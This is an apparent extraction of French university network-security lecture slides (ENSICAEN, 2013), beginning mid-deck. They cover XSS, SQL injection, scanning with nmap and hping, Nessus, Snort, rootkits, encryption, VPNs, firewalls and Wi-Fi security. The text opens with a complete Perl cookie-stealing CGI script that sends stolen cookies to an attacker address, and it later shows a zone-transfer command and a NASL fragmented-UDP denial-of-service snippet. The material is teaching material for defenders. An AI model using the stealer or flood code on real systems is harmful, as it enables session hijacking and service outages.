#!/usr/bin/perl # steal.cgi by David Endler dendler@idefense.com # Specific to your system $mailprog = '/usr/sbin/sendmail'; # create a log file of cookies, well also email them too open(COOKIES,>>stolen_cookie_file); # what the victim sees, customize as needed print "Content-type:text/html\n\n"; print <<EndOfHTML; <html><head><title>Cookie Stealing</title></head> <body> Your Cookie has been stolen. Thank you. </body></html> EndOfHTML # The QUERY_STRING environment variable should be filled with # the cookie text after steal.cgi: # http://www.attacker.com/steal.cgi?XXXXX print COOKIES $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; # now email the alert as well so we can start to hijack open(MAIL,"|$mailprog -t"); print MAIL "To: attacker\@attacker.com\n"; print MAIL "From: cookie_steal\@attacker.com\n"; print MAIL "Subject: Stolen Cookie Submission\n\n"; print MAIL "-" x 75 . "\n\n"; print MAIL $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; close (MAIL);
06/11/2013
- ENSICAEN -
(c) dp
157
fichier test1_xss.php3
06/11/2013 - ENSICAEN (c) dp 158
Remde possible
Ne jamais faire confiance une saisie utilisateur. Ne jamais afficher lcran tel quel une saisie utilisateur. Filtrer tous les caractres indsirables (comme les caractres < et >). Exemple en php: print htmlspecialchars ("Bonjour $nom") ;
06/11/2013 - ENSICAEN (c) dp 159
Lauthentification .htaccess
Systme dauthentification frquemment utilis pour restreindre laccs au contenu de rpertoires spcifiques. Filtre par domaine, mcanisme login/mot de passe. Fichier .htaccess par dfaut.
06/11/2013 - ENSICAEN (c) dp 160
Exemple de connexion
06/11/2013
- ENSICAEN -
(c) dp
161
06/11/2013
- ENSICAEN -
(c) dp
162
Injection SQL
Beaucoup d'applications web s'appuient sur des bases de donnes. Les requtes SQL utilisent des informations saisies par les utilisateurs. Les informations doivent tre traites avant utilisation.
06/11/2013 - ENSICAEN (c) dp 163
Injection SQL
06/11/2013
- ENSICAEN -
(c) dp
164
Injection SQL
http://www.xkcd.com/327
06/11/2013
- ENSICAEN -
(c) dp
165
06/11/2013
- ENSICAEN -
(c) dp
167
Cartographie du rseau
Mthode standard peu efficace: ping (Packet Internet Groper). Outils plus sophistiqus: Pinger http://www.nmrc.org/files/snt/ fping http://www.fping.com hping3 http://www.hping.org - Test firewall rules - Advanced port scanning - Test net performance using different protocols, packet size, TOS (type of service) and fragmentation. - Path MTU discovery - Transferring files between even really fascist firewall rules. - Traceroute-like under different protocols. - Firewalk-like usage. - Remote OS fingerprinting. - TCP/IP stack auditing. - A lot of others.
06/11/2013
- ENSICAEN -
(c) dp
169
Cartographie du rseau
Le DNS d'un site centralise toutes les machines connectes au rseau. Certains DNS incorrectement configurs peuvent autoriser des transferts de zones: dig @ns.domaine.com domaine.com axfr Outil DNSMap rcupration dinformations
06/11/2013
- ENSICAEN -
(c) dp
170
nmap
Outil de rfrence. nmap sous unix (http://www.nmap.org) Scanne une machine ou un rseau la recherche des services ouverts et de son identit. Supporte de nombreuses techniques de scan:
06/11/2013
- ENSICAEN -
(c) dp
172
(-sT, dfaut) (-sS) (-sF) (-sX) (-sN) (-b server) (-f) (-sU) (-sR) (-I)
173
06/11/2013
nmap
Beaucoup de fonctionnalits prsentes dans nmap: Scan Sans envoi de trame ICMP (-P0) Scan en mode verbeux (-v v) Impose le port source (-g port) FingerPrinting: Remote OS detection (-O) decoy scanning (-Ddecoy_host1,decoy2[,...]) Timing policy (-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane)
06/11/2013
- ENSICAEN -
(c) dp
174
06/11/2013
- ENSICAEN -
(c) dp
175
Scan Spoof
hping permet de scanner une machine en usurpant l'identit d'une autre:
scanner
SYN, port, source=rebond RST si port ferm
cible
SYN-ACK
06/11/2013
- ENSICAEN -
(c) dp
176
FingerPrinting passif
FingerPrinting est dit passif quand il n'met aucune information:
Analyse des trames envoyes par une machine distante. Analyse d'un fichier de log.
Exemple: p0f
http://www.stearns.org/p0f
06/11/2013 - ENSICAEN (c) dp 177
Association port-processus
Comment trouver localement quel processus est en coute sur un port:
Unix
netstat anp (sur les versions rcentes d'unix) commande plus gnrale: lsof (LiSt Opened Files)
ftp://vic.cc.purdue.edu/pub/tools/unix/lsof
Windows
Active Ports tcpview
06/11/2013 - ENSICAEN (c) dp 178
06/11/2013
Exemple Windows
06/11/2013
- ENSICAEN -
(c) dp
180
06/11/2013
- ENSICAEN -
(c) dp
181
06/11/2013
- ENSICAEN -
(c) dp
182
Concept de faille
Une faille est une vulnrabilit permettant des attaquants d'obtenir un accs non autoris un systme. On peut trouver des vulnrabilits tous les niveaux:
routeurs logiciels client/serveur systme d'exploitation firewalls
06/11/2013
- ENSICAEN -
(c) dp
183
Vulnrabilits
Des dizaines de vulnrabilits sont dcouvertes chaque semaine (environ 7000 failles publies sur Internet en 2011 et 26 millions de codes malveillants diffuss*) Une vulnrabilit peut tre la consquence d'une ngligence (mot de passe nul ou trivial par exemple) ou d'une erreur de programmation (buffer overflow, ). Certaines vulnrabilits peuvent tre gardes secrtes ( des fins d'espionnage, d'utilisation mafieuse, ). La dcouverte de nouvelles vulnrabilits peut faire l'objet de rmunration; on entre dans l're du "vulnerability business". Certaines vulnrabilits peuvent tre divulgues immdiatement (0 day); phnomne dangereux et irresponsable. Certains sites diffusent des exploits sans mentionner de correctifs.
06/11/2013
- ENSICAEN -
(c) dp
184
Vulnrabilits
Un administrateur doit se tenir inform quotidiennement des dernires vulnrabilits et avoir de la ractivit. Beaucoup d'information en ligne: Sites officiels CERT (Computer Emergency Response Team) Gouvernement franais:
Premier Ministre SGDN (Secrtaire Gnral de la Dfense Nationale) ANSSI (Agence Nationale de la Scurit des Systmes dInformation) COSSI (Centre Oprationnel de la scurit des Systmes dInformations) CERTA (Centre d'Expertise de Rponse et de Traitement des Attaques)
(http://www.securityfocus.com)
06/11/2013
et beaucoup d'autres
- ENSICAEN -
(c) dp
185
06/11/2013
- ENSICAEN -
(c) dp
186
Scanners
Attention aux problmes lgaux et thiques lors de l'utilisation de scanners. Les scanners laissent des traces dans les fichiers d'audit. On trouve des scanners commerciaux et domaines public.
06/11/2013 - ENSICAEN (c) dp 188
Scanners
Historiquement: SATAN (Security Administrator's Tool for Analysing Networks) distribu en avril 1995 par Dan Farmer et Weitse Venema. Quelques rfrences de scanners:
nessus http://www.nessus.org iss http://www.iss.net
06/11/2013 - ENSICAEN (c) dp 189
Modle client/serveur: Utilise des plug-in Dispose un langage de programmation (NASL = Nessus Attack Scripting Language)
06/11/2013 - ENSICAEN (c) dp 190
Nessus: suite
Gnre des rapports clairs et exportables. Base de donnes des vulnrabilits connues remise jour rgulirement. Nessus (Licence GPL jusque V2)
OpenVAS
191
06/11/2013
- ENSICAEN -
(c) dp
192
udp1 = forge_udp_packet( ip : ip, uh_sport: sport, uh_dport: dport, uh_ulen : 8 + PADDING); set_ip_elements(ip : ip, ip_off : FRG_CONST + 1, ip_len : 20 + FRG_CONST); udp2 = forge_udp_packet(ip : ip,uh_sport : sport, uh_dport : dport, uh_ulen : 8 + PADDING); send_packet(udp1, udp2, pcap_active:FALSE) x 500; sleep(5); alive = end_denial(); if(!alive){ set_kb_item(name:"Host/dead", value:TRUE); security_hole(0, prototype:"udp"); }
addr = this_host(); ip = forge_ip_packet(ip_v : 4, ip_hl : 5, ip_len : 20 + 8 + PADDING, ip_id : 0x455, ip_p : IPPROTO_UDP, ip_tos : 0, ip_ttl : 0x40, ip_off : IP_MF, ip_src : addr);
06/11/2013
- ENSICAEN -
(c) dp
193
06/11/2013
- ENSICAEN -
(c) dp
196
Snort: fonctionnalits
Dtection au niveau des protocoles IP TCP UDP ICMP Dtection dactivits anormales Stealth scan, OS Finger Printing code ICMP invalide Prprocesseur pour la gestion des fragments, les sessions http,
06/11/2013 - ENSICAEN (c) dp 197
Architecture de snort
Sortie 1 plugins de dtection Prprocesseur 1
Sortie n
libpcap
06/11/2013
- ENSICAEN -
(c) dp
198
06/11/2013
06/11/2013
- ENSICAEN -
(c) dp
200
Exemple d'attaquant
06/11/2013
- ENSICAEN -
(c) dp
201
Mtrologie
Les outils d'analyse de trafic et de mtrologie permettent de dtecter l'utilisation anormale du rseau et les pics de consommation (scan massif, ). Quelques exemples d'outils:
extra (EXternal TRaffic Analyser) http://lpsc.in2p3.fr/extra/ mrtg (Multi Router Traffic Grapher) http://www.mrtg.org vigilog http://vigilog.ensmp.fr/
06/11/2013 - ENSICAEN (c) dp 203
extra
Logiciel de monitoring du trafic rseau Fonctions de base:
Recueil des logs routeurs (IP source, IP destination, Port source, Port destination, volume). Stockage dans une base de donnes Traitement systmatique sur les logs Interface graphique d'analyse
06/11/2013 - ENSICAEN (c) dp 204
INTERNET
EXTRA
EXTRA BD
RESEAU LOCAL
LOAD START/STOP LOGS
ROUTEUR
SNIFFER
COLLECTEUR
06/11/2013
- ENSICAEN -
(c) dp
205
Exemple de rsultat
06/11/2013
- ENSICAEN -
(c) dp
206
mrtg
Utilisation de SNMP pour relever les compteurs des priphriques (routeurs, ). Cration de pages html en temps rels contenant des graphes reprsentant le trafic sur le rseau en cours de surveillance.
06/11/2013 - ENSICAEN (c) dp 207
06/11/2013
- ENSICAEN -
(c) dp
208
vigilog
Rediriger les violations d'ACL d'un routeur sur le syslog d'une machine. Traitement des logs par des scripts perl. Courriel de synthse envoy l'administrateur. Rapport sous forme de page html:
adresses d'origine les plus actives. adresses de destination les plus actives. les ports les plus recherchs. etc.
- ENSICAEN (c) dp 209
06/11/2013
06/11/2013
- ENSICAEN -
(c) dp
211
06/11/2013
- ENSICAEN -
(c) dp
214
06/11/2013
- ENSICAEN -
(c) dp
215
06/11/2013
- ENSICAEN -
(c) dp
217
06/11/2013
- ENSICAEN -
(c) dp
218
RootKits
Un "rootkit" est dfini par la NSA:
A hacker security tool that captures passwords and message traffic to and from a computer. A collection of tools that allows a hacker to provide a backdoor into a system, collect information on other systems on the network, mask the fact that the system is compromised, and much more. Rootkit is a classic example of Trojan Horse software. Rootkit is available for a wide range of operating systems.
06/11/2013 - ENSICAEN (c) dp 219
RootKits
Souvent utilis par un intrus pour se dissimuler et garder les accs privilgis qu'il a obtenu. Les premires alertes sur l'utilisation de rootkits datent de fvrier 1994. Outil devenu trs populaire et qui complique la dtection d'intrusion. Un rootkit classique contiendra un sniffer, des logiciels avec backdoors comme inetd, login,, remplacera des commandes comme ps, netstat, ls, On pourra trouver galement des commandes de nettoyage de logs (/var/log), etc.
06/11/2013
- ENSICAEN -
(c) dp
220
06/11/2013
- ENSICAEN -
(c) dp
221
Dtection de rootkits
Si la machine est infecte, toutes les commandes locales sont suspectes. Dtection des ports ouverts non officiels (avec nmap sur une machine externe). Par exemple l'inetd de lrk4 ouvre le port 5002. Recherche des rpertoires spcifiques aux rootkits (par exemple /dev/ptry avec lrk4). Utilitaires de dtection: unix: chkrootkit http://www.chkrootkit.org/ windows: rootkitrevealer
http://www.sysinternals.com/ntw2k/freeware/rootkitreveal.shtml Strider GhostBuster http://research.microsoft.com/rootkit/
06/11/2013
Bibliothques Dynamiques
Beaucoup de fichiers sont modifier pour rester invisible. Cependant, les binaires utilisent le concept des bibliothques dynamiques pour viter d'tre trop gros (dll sous windows, fichiers .so sous unix). La modification d'une bibliothque dynamique peut suffire modifier plusieurs commandes.
06/11/2013 - ENSICAEN (c) dp 223
06/11/2013
- ENSICAEN -
(c) dp
224
Chiffrement de documents
Les documents importants doivent tre chiffrs. Le chiffrement peut tre matriel (ordinateur portable avec disque auto chiffrant, cl usb auto chiffrante, ) Le chiffrement peut tre logiciel, beaucoup de logiciels existent. winrar (chiffrement symtrique) GnuPG (chiffrement asymtrique) Enigmail plugin de Thunderbird pour lchange de courrier lectronique chiffr/sign. Truecrypt: Chiffrement de disques, de partitions de disques, de cls USB.
- ENSICAEN (c) dp 226
06/11/2013
Protocoles chiffrs
Les informations confidentielles doivent transiter sur le rseau par des protocoles chiffrs: Exemples:
https pops imaps smtps etc. plutt que http plutt que pop plutt que imap plutt que smtp
- ENSICAEN (c) dp 227
06/11/2013
Session chiffre
ssh (Secure Shell) plutt que telnet,rlogin,rsh,rcp Gnration d'une paire de clef RSA (toutes les heures) par le serveur. Envoi de la clef publique au client qui se connecte. Le client gnre une clef symtrique, la chiffre avec la clef du serveur et la renvoie au serveur. Le reste de la communication est en chiffrement symtrique.
06/11/2013 - ENSICAEN (c) dp 228
Tunneling
Un protocole de tunneling est utilis pour crer un chemin priv (tunnel) travers une infrastructure ventuellement publique. Les donnes peuvent tre encapsules et cryptes pour emprunter le tunnel. Solution intressante pour relier deux entits distantes moindre cot.
06/11/2013 - ENSICAEN (c) dp 229
Tunneling ssh
Un flux tcp quelconque peut tre redirig dans un tunnel ssh:
client serveur
client ssh
serveur ssh
06/11/2013
- ENSICAEN -
(c) dp
230
06/11/2013
- ENSICAEN -
(c) dp
231
06/11/2013
- ENSICAEN -
(c) dp
232
06/11/2013
- ENSICAEN -
(c) dp
233
06/11/2013
- ENSICAEN -
(c) dp
234
Fonctionnement SSL
1) Hello, version de SSL, protocole de chiffrement pris en charge, longueurs de cl, mcanisme d'change de cl 2) Hello, examen des mthodes supportes par le client, envoi les mthodes et algorithmes de chiffrement, longueurs et mcanisme d'changes de cl compatibles, envoi de la cl publique approuve par une autorit.
client SSL
serveur SSL
3) Vrification du certificat envoy par le serveur, envoi d'un message cl matre: liste de mthodologie de scurit de scurit employes par le client et cl de session crypte avec la cl publique du serveur.
06/11/2013
- ENSICAEN -
(c) dp
235
IPSec
IP SECurity protocol issu d'une task force de l'IETF Quelques spcifications de l'IPSec: Authentification, confidentialit et intgrit (protection contre l'IP spoofing et le TCP session hijacking) Confidentialit (session chiffre pour se protger du sniffing) Scurisation au niveau de la couche transport (protection L3). Algorithmes utiliss: Authentification pas signature DSS ou RSA Intgrit par fonction de condensation (HMAC-MD5, HMACSHA-1, ) Confidentialit par chiffrement DES, RC5,IDEA,CAST, Blowfish
- ENSICAEN (c) dp 236
06/11/2013
Fonctionnement IPSec
ipsec peut fonctionner:
en mode transport; les machines source et destination sont les 2 extrmits de la connexion scurise. en mode tunnel: les extrmits de la connexion scurise sont des passerelles; les communications hte hte sont encapsules dans les enttes de protocole de tunnel IPSec. en mode intermdiaire: tunnel entre une machine et une passerelle.
06/11/2013 - ENSICAEN (c) dp 237
06/11/2013
- ENSICAEN -
(c) dp
239
06/11/2013
- ENSICAEN -
(c) dp
240
06/11/2013
- ENSICAEN -
(c) dp
241
06/11/2013
- ENSICAEN -
(c) dp
242
Site site
utilisateur nomade
06/11/2013 - ENSICAEN (c) dp 243
Firewall
06/11/2013
- ENSICAEN -
(c) dp
244
Firewall
Protger son rseau du monde extrieur (Internet, autres services de l'entreprise). Maintenir des utilisateurs l'intrieur du rseau (employ, enfant, ) Restreindre le nombre de machines surveiller avec un maximum d'attention. Certaines machines doivent rester ouvertes (serveur www, dns, etc).
06/11/2013 - ENSICAEN (c) dp 245
Firewall
C'est un outil souvent indispensable mais jamais suffisant:
Pas de protection contre le monde intrieur Pas de protection contre les mots de passe faibles
Firewall
Contrler les accs entrant et sortant:
par service par adresse IP
Firewall
Diffrents types de firewall:
filtres de paquets passerelles de circuits passerelles d'application Combinaison des 3 types prcdents
06/11/2013
- ENSICAEN -
(c) dp
248
Filtrage de paquets
06/11/2013
- ENSICAEN -
(c) dp
250
Passerelle de circuits
06/11/2013
- ENSICAEN -
(c) dp
252
Passerelle d'applications
06/11/2013
- ENSICAEN -
(c) dp
254
06/11/2013
- ENSICAEN -
(c) dp
255
06/11/2013
- ENSICAEN -
(c) dp
256
Translation d'adresses, Tunnels IPsec, PPTP, L2TP, Identification des connexions, Serveur Web pour offrir une interface de configuration agrable, Relai applicatif (proxy), Dtection d'intrusion (IDS) Prvention d'intrusion (IPS)
- ENSICAEN (c) dp 257
06/11/2013
Exemples firewall
checkpoint
http://www.checkpoint.com
06/11/2013
- ENSICAEN -
(c) dp
258
06/11/2013
- ENSICAEN -
(c) dp
259
Les honeypots
06/11/2013
- ENSICAEN -
(c) dp
260
06/11/2013
Honeypot
Un honeypot peut etre une machine simple sans scurit (par exemple sans mot de passe administrateur). Un logiciel permettant de grer des htes virtuels et de simuler des piles TCP/IP diffrentes. Une liste de logiciels d'honeypot: http://www.honeypots.net/honeypots/products
06/11/2013
- ENSICAEN -
(c) dp
262
06/11/2013
- ENSICAEN -
(c) dp
263
06/11/2013
- ENSICAEN -
(c) dp
264
Wifi et scurit
06/11/2013
- ENSICAEN -
(c) dp
266
06/11/2013
Modes de communication
Mode infrastructure
Mode AD HOC
06/11/2013
- ENSICAEN -
(c) dp
269
Wi-Fi: la rglementation
Lutilisation des frquences est normalise par lETSI (European Telecommunications Standard Institute). Cette normalisation est soumise lagrment dorganismes nationaux; en France par lARCEP (ex ART). Pas dhomognisation de la disponibilit des frquences au niveau europen. En France, libralisation de lutilisation des frquences (France hexagonale) depuis le 24 juillet 2003 (communiqu de lART).
06/11/2013
- ENSICAEN -
(c) dp
270
Les consquences
Ecoute et interception de trafics Insertion de trafic Introduction d'une station illicite sur le rseau rebonds
06/11/2013 - ENSICAEN (c) dp 273
Le chiffrement WEP
Historiquement le premier chiffrement utilis par le WiFi. Chiffrement symtrique des trames 802.11 utilisant l'algorithme RC4 avec des cls de 64 ou 128 bits. Les 24 premiers bits servent pour l'initialisation diminuant d'autant la taille de la cl. La cl doit tre partage par tous les quipements. Cet algorithme de chiffrement est trs insuffisant.
06/11/2013
- ENSICAEN -
(c) dp
275
Le chiffrement WPA
Le chiffrement WPA repose sur des protocoles d'authentification et un algorithme de chiffrement robuste: TKIP (Temporary Key Integrity Protocol) qui introduit un chiffrement par paquet et un changement automatique des cls de chiffrement. WPA repose sur un serveur d'authentification (gnralement un serveur RADIUS, Remote Authentification Dial-in User Service) permettant d'identifier les utilisateurs et de leur dfinir des droits. Pour les petits rseaux, une version restreinte du protocole est appele WPA-PSK (Pre Share Key) ncessitant de dployer une mme cl de chiffrement (pass phrase) pour tous les quipements.
06/11/2013
- ENSICAEN -
(c) dp
276
Le chiffrement WPA2
La norme 802.11i a t ratifie le 24 juin 2004. La certification WPA2 a t cre par la Wi-Fi Alliance. WPA2 utilise l'algorithme AES (Advanced Encryption Standard).
06/11/2013
- ENSICAEN -
(c) dp
277
L'authentification
Authentification par adresse MAC est peu scurise. Le protocole 802.1X dfinit une encapsulation de EAP (Extensible Authentification Protocol) au dessus du protocole IEEE 802.11 Diffrentes variantes du protocole EAP:
Protocole EAP-MD5 (EAP - Message Digest 5) ; protocole LEAP (Lightweight EAP) developp par Cisco ; protocole EAP-TLS (EAP - Transport Layer Security) cre par Microsoft et accept sous la norme RFC 2716 ; protocole EAP-TTLS (EAP - Tunneled Transport Layer Security) developp par Funk Software et Certicom ; protocole PEAP (Protected EAP) developp par Microsoft, Cisco et RSA Security ...
06/11/2013 - ENSICAEN (c) dp 278
L'authentification
EAP-TLS authentifie les deux parties par des certificats; le serveur prsente un certificat, le client le valide et prsente son tour son certificat. PEAP utilis avec MS-CHAPv2 requiert un certificat ct serveur et un couple login/mot de passe ct client.
06/11/2013 - ENSICAEN (c) dp 279
Conseils et conclusions
06/11/2013 - ENSICAEN (c) dp 280
06/11/2013
- ENSICAEN -
(c) dp
282
Installation/Administration
Prudence dans linstallation par dfaut des logiciels Protection physique des quipements. Intgration des objectifs "scurit" dans les choix de rseaux et des systmes d'exploitation. Localiser et ne laisser ouvert que les services indispensables. Fermer les comptes inutiliss.
06/11/2013 - ENSICAEN (c) dp 283
Installation/Administration
Se tenir informer des vulnrabilits. Passer rgulirement les correctifs. Installer les outils ncessaires (contrle d'authentification, audits, ) Consulter rgulirement le journal gnr par ces outils. Informer ses utilisateurs. Chiffrement des informations etc
06/11/2013 - ENSICAEN (c) dp 284
06/11/2013
- ENSICAEN -
(c) dp
285
Conclusions
Aucune scurit n'est parfaite. On dfinit juste un seuil. Des outils sont ncessaires, mais le travail quotidien est indispensable. Le niveau de scurit d'un site est celui de son maillon le plus faible. La scurit n'apporte qu'un gain indirect. Par consquent, il n'est pas facile de convaincre les dcideurs de l'entreprise.
06/11/2013
- ENSICAEN -
(c) dp
286
Conclusions
Le seul systme informatique qui est vraiment sr est un systme teint et dbranch, enferm dans un blockhaus sous terre, entour par des gaz mortels et des gardiens hautement pays et arms. Mme dans ces conditions, je ne parierais pas ma vie dessus. (c) Gene Spafford, fondateur et directeur du "Computer Operations, Audit and Security Technology Laboratory.
06/11/2013 - ENSICAEN (c) dp 287
06/11/2013